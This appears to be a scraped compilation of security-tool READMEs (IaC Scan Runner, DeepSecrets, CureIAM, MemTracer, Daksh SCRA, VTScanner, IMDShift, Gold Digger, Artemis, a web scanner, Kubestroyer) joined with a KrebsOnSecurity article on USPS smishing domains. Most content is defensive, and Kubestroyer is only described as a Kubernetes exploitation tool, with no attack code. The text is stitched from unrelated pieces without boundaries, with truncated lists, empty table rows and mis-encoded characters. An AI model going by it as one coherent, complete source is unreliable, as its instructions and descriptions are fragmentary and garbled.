$ docker run --name mongodb -p 27017:27017 mongo
# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app
This part will show one of the possible deployments and short examples on how to use API calls.
Firstly we will clone the iac scan runner repository and run the API.
$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up
After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.
curl -X 'POST' \
'http://0.0.0.0/project?creator_id=test' \
-H 'accept: application/json' \
-d ''
project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'
That is it.
At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.
Step 1 β Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runnerβs source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods:
Step 2 β Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runnerβs source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks
self.iac_checks = {
new_tool.name: new_tool,
β¦
}
Step 3 β Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.
compatibility_matrix = {
"new_type": ["new_tool_1", "new_tool_2"],
β¦
"old_typeK": ["tool_1", β¦ "tool_N", "new_tool_3"]
}
Step 4 β Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included:
if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"
You can contact the xOpera team by sending an email to xopera@xlab.si.
This project has received funding from the European Unionβs Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).
Existing tools don't really "understand" code. Instead, they mostly parse texts.
DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.
DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.
Under the hood story is in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem
Pff, is it still regex-based?
Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes is an instrument, not a problem.
Why don't you build true abstract syntax trees? It's academically more correct!
DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply an overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach.
I'd like to build my own semantic rules. How do I do that?
Only through the code by the moment. Formalizing the rules and moving them into a flexible and user-controlled ruleset is in the plans.
I still have a question
Feel free to communicate with the maintainer
From Github via pip
$ pip install git+https://github.com/avito-tech/deepsecrets.git
From PyPi
$ pip install deepsecrets
The easiest way:
$ deepsecrets --target-dir /path/to/your/code --outfile report.json
This will run a scan against /path/to/your/code
using the default configuration:
Report will be saved to report.json
Run deepsecrets --help
for details.
Basically, you can use your own ruleset by specifying --regex-rules
. Paths to be excluded from scanning can be set via --excluded-paths
.
The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json
. You're free to follow the format and create a custom ruleset.
Example ruleset for regex checks is located in /deepsecrets/rules/regexes.json
. You're free to follow the format and create a custom ruleset.
There are several core concepts:
File
Tokenizer
Token
Engine
Finding
ScanMode
Just a pythonic representation of a file with all needed methods for management.
A component able to break the content of a file into pieces - Tokens - by its logic. There are four types of tokenizers available:
FullContentTokenizer
: treats all content as a single token. Useful for regex-based search.PerWordTokenizer
: breaks given content by words and line breaks.LexerTokenizer
: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.A string with additional information about its semantic role, corresponding file, and location inside it.
A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:
RegexEngine
: checks tokens' values through a special rulesetSemanticEngine
: checks tokens produced by the LexerTokenizer using additional context - variable names and valuesHashedSecretEngine
: checks tokens' values by hashing them and trying to find coinciding hashes inside a special rulesetThis is a data structure representing a problem detected inside code. Features information about the precise location inside a file and a rule that found it.
This component is responsible for the scan process.
PerFileAnalyzer
- the method called against each file, returning a list of findings. The primary usage is to initialize necessary engines, tokenizers, and rulesets.The current implementation has a CliScanMode
built by the user-provided config through the cli args.
The project is supposed to be developed using VSCode and 'Remote containers' feature.
Steps:
CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
safe_to_apply_score
, risk_score
, over_privilege_score
. Each score serves a different purpose. For safe_to_apply_score
identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml
config file.Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml
, ~/.CureIAM.yaml
, ~/CureIAM.yaml
, or CureIAM.yaml
and there is Service account JSON file present in current directory with name preferably cureiamSA.json
. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run CureIAM process as schedular
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image, as schedular
$ docker run -d cureiam
# Run the image now
$ docker run -f cureiam -m cureiam -n
CureIAM.yaml
configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.
logger:
version: 1
disable_existing_loggers: false
formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"
handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple
file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5
loggers:
adal-python:
level: INFO
root:
level: INFO
handlers:
- rich_console
- file
schedule: "16:00"
This subsection of config uses, Rich
logging module and schedules CureIAM to run daily at 16:00
.
plugins
section in CureIAM.yaml
. You can think of this section as declaration for different plugins. plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json
filestore:
plugin: CureIAM.plugins.files.filestore.FileStore
gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_scor e_group: 0
min_safe_to_apply_score_SA: 50
esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword
Each of these plugins declaration has to be of this form:
plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2
For example, for plugins CureIAM.stores.esstore.EsStore
which is this file and class EsStore
. All the params which are defined in yaml has to match the declaration in __init__()
function of the same plugin class.
audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore
Multiple Audits can be created out of this. The one created here is named IAMAudit
with three plugins in use, gcpCloud
, gcpIamProcessor
, filestores
and esstore
. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.
CureIAM
to run the Audits defined in previous step. run:
- IAMAudits
And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.
The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
<>
=============
Adding the version in library to avoid any back compatibility issues.
Running docker compose: docker-compose -f docker_compose_es.yaml up
mode_scan: true
mode_enforce: false
MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory regionβs characteristics:
The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
Furthermore, the tool features the following options:
python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for spcefic loaded DLL
The script needs administrator privileges in order incepect all processes.
The fake USPS phishing page.
Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Hereβs a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the readerβs address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.
The landing page generated by the phishing link includes the USPS logo, and says βYour package is on hold for an invalid recipient address. Fill in the correct address info by the link.β Below that message is a βClick updateβ button that takes the visitor to a page that asks for more information.
The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.
This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpageβs code and operations.
Check out the bottom portion of the screenshot below, and youβll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.
A search on this domain at the always-useful URLscan.io shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):
usps.receivepost[.]com
usps.informedtrck[.]com
usps.trckspost[.]com
postreceive[.]com
usps.trckpackages[.]com
usps.infortrck[.]com
usps.quicktpos[.]com
usps.postreceive].]com
usps.revepost[.]com
trackingusps.infortrck[.]com
usps.receivepost[.]com
usps.trckmybusi[.]com
postreceive[.]com
tackingpos[.]com
usps.trckstamp[.]com
usa-usps[.]shop
usps.infortrck[.]com
unlistedstampreceive[.]com
usps.stampreceive[.]com
usps.stamppos[.]com
usps.stampspos[.]com
usps.trckmypost[.]com
usps.trckintern[.]com
usps.tackingpos[.]com
usps.posinformed[.]com
As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code β UA-80133954-3 β which apparently was rejected for pointing to an invalid domain.
Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. Click to enlarge. That code actually belongs to the USPS.
The valid domain for that Google Analytics code is the official usps.com website. According to dnslytics.com, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which DomainTools.com says was registered way back in September 2018 to an individual in Nigeria.
A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which archive.org shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.
DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based Alibaba.com, but the registrant city and state listed for that domain says βGeorgia, AL,β which is not a real location.
Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in β.top.β These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.
Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).
A phishing page targeting An Post, the state-owned provider of postal services in Ireland.
The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.
An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox any.run. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.
The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlunβs other Telegram channels, it appears this account is being massively spammed at the moment β possibly thanks to public attention brought by this story.
Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.
Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.
With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.
If youβre unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually β ideally, using a browser bookmark so as to avoidΒ potential typosquatting sites.
Update: Added information about the Telegram bot and any.run analysis.
Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.
Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.
What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.
Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.
While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.
Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.
Identifies Areas of Interest in File Paths (Worldβs First): Recognises patterns in file paths to pinpoint relevant sections for review.
Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.
Automated Scientific Effort Estimation for Code Review (Worldβs First): Providing a measurable approach for estimating efforts required for a code review process.
Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.
Additionally, the tool offers the following functionalities:
Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki
Feel free to contribute towards updating or adding new rules and future development.
If you find any bugs, report them to d3basis.m0hanty@gmail.com.
Python3 and all the libraries listed in requirements.txt
$ pip install virtualenv
$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv
$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate
After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $
You must run the below command after activating the virtual environment as mentioned in the previous steps.
pip install -r requirements.txt
Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.
$ python3 dakshscra.py -h // To view avaialble options and arguments
usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]
options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review
$ python3 dakshscra.py // To view tool usage along with examples
Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshsca.py -r php -t /source_dir_path
# To override default settings, other filetypes can be specified with '-f' option.
dakshsca.py -r php -f dotnet -t /path_to_source_dir
dakshsca.py -r php -f custom -t /path_to_source_dir
# Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
dakshsca.py -recon -r php -t /path_to_source_dir
# Perform only reconnaissance if '-recon' used without the '-r' option.
dakshsca.py -recon -t /path_to_source_dir
# Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
dakshsca.py -r php -vv -t /path_to_source_dir
Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TY PES: dotnet, php, java, custom, allfiles
The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.
Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.
Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.
Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.
VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.
VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.
Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.
VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.
VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.
If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.
VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.
For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.
If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.
Before installing VTScanner, make sure you have the following prerequisites in place:
pip install -r requirements.txt
You can acquire VTScanner by cloning the GitHub repository to your local machine:
git clone https://github.com/samhaxr/VTScanner.git
To initiate VTScanner, follow these steps:
cd VTScanner
python3 VTScanner.py
VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.
VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.
AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration process of all workloads to IMDSv2 with extensive capabilities, which implements enhanced security measures to protect against these attacks.
MetadataNoToken
CloudWatch metric across specified regionsMetabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.
IMDShift makes several improvements on Metabadger's capabilities:
git clone https://github.com/ayushpriya10/imdshift.git
cd imdshift/
python3 -m pip install .
git clone https://github.com/ayushpriya10/imdshift.git
cd imdshift/
python3 -m pip install -e .
Options:
--services TEXT This flag specifies services scan for IMDSv1
usage from [EC2, Sagemaker, ASG (Auto Scaling
Groups), Lightsail, ECS, EKS, Beanstalk].
Format: "--services EC2,Sagemaker,ASG"
--include-regions TEXT This flag specifies regions explicitly to
include scan for IMDSv1 usage. Format: "--
include-regions ap-south-1,ap-southeast-1"
--exclude-regions TEXT This flag specifies regions to exclude from the
scan explicitly. Format: "--exclude-regions ap-
south-1,ap-southeast-1"
--migrate This boolean flag enables IMDShift to perform
the migration, defaults to "False". Format: "--
migrate"
-- update-hop-limit INTEGER This flag specifies if the hop limit should be
updated and with what value. It is recommended
to set the hop limit to "2" to enable containers
to be able to work with the IMDS endpoint. If
this flag is not passed, hop limit is not
updated during migration. Format: "--update-hop-
limit 3"
--enable-imds This boolean flag enables IMDShift to enable the
metadata endpoint for resources that have it
disabled and then perform the migration,
defaults to "False". Format: "--enable-imds"
--profile TEXT This allows you to use any profile from your
~/.aws/credentials file. Format: "--profile
prod-env"
--role-arn TEXT This flag let's you assume a role via aws sts.
Format: "--role-arn
arn:aws:sts::111111111:role/John"
--print-scps This boolean flag prints Service Control
Policies (SCPs) that can be used to control IMDS
usage, like deny access for credentials fetched
from IMDSv2 or deny creation of resources with
IMDSv1, defaults to "False". Format: "--print-
scps"
--check-imds-usage This boolean flag launches a scan to identify
how many instances are using IMDSv1 in specified
regions, during the last 30 days, by using the
"MetadataNoToken" CloudWatch metric, defaults to
"False". Format: "--check-imds-usage"
--help Show this message and exit.
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json
file. Additionally, you can leverage an exclusion file called exclusions.json
for skipping files matching specific extensions. Provide the root folder as the --directory
flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to parse all 3 account reports:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.
A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).
The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.
Artemis is experimental software, under active development - use at your own risk.
For an up-to-date list of features, please refer to the documentation.
To run the tests, use:
./scripts/test
Artemis uses pre-commit
to run linters and format the code. pre-commit
is executed on CI to verify that the code is formatted properly.
To run it locally, use:
pre-commit run --all-files
To setup pre-commit
so that it runs before each commit, use:
pre-commit install
To build the documentation, use:
cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html
Please refer to the documentation.
Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.
However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.
Serial No. | Tool Name | Serial No. | Tool Name | |
---|---|---|---|---|
1 | whatweb | 2 | nmap | |
3 | golismero | 4 | host | |
5 | wget | 6 | uniscan | |
7 | wafw00f | 8 | dirb | |
9 | davtest | 10 | theharvester | |
11 | xsser | 12 | fierce | |
13 | dnswalk | 14 | dnsrecon | |
15 | dnsenum | 16 | dnsmap | |
17 | dmitry | 18 | nikto | |
19 | whois | 20 | lbd | |
21 | wapiti | 22 | devtest | |
23 | sslyze |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attackerβs control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.
Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.
Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.
CVSS V3 SCORE RANGE SEVERITY IN ADVISORY 0.1 - 3.9 Low 4.0 - 6.9 Medium 7.0 - 8.9 High 9.0 - 10.0 Critical
Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan | |
---|---|---|---|---|
1 | IPv6 | 2 | Wordpress | |
3 | SiteMap/Robot.txt | 4 | Firewall | |
5 | Slowloris Denial of Service | 6 | HEARTBLEED | |
7 | POODLE | 8 | OpenSSL CCS Injection | |
9 | FREAK | 10 | Firewall | |
11 | LOGJAM | 12 | FTP Service | |
13 | STUXNET | 14 | Telnet Service | |
15 | LOG4j | 16 | Stress Tests | |
17 | WebDAV | 18 | LFI, RFI or RCE. | |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present | |
21 | Shellshock Bug | 22 | Leaks Internal IP | |
23 | HTTP PUT DEL Methods | 24 | MS10-070 | |
25 | Outdated | 26 | CGI Directories | |
27 | Interesting Files | 28 | Injectable Paths | |
29 | Subdomains | 30 | MS-SQL DB Service | |
31 | ORACLE DB Service | 32 | MySQL DB Service | |
33 | RDP Server over UDP and TCP | 34 | SNMP Service | |
35 | Elmah | 36 | SMB Ports over TCP and UDP | |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions , Feature Requests and Bug Reports are more than welcome.
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests
Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes clusters misconfigurations.
The tool is scanning known Kubernetes ports that can be exposed as well as exploiting them.
To get a local copy up and running, follow these simple example steps.
wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz
Use prebuilt binary
or
Using go install command :
$ go install github.com/Rolix44/Kubestroyer@latest
or
build from source:
$ git clone https://github.com/Rolix44/Kubestroyer.git
$ go build -o Kubestroyer cmd/kubestroyer/main.go
Parameter | Description | Mand/opt | Example |
---|---|---|---|
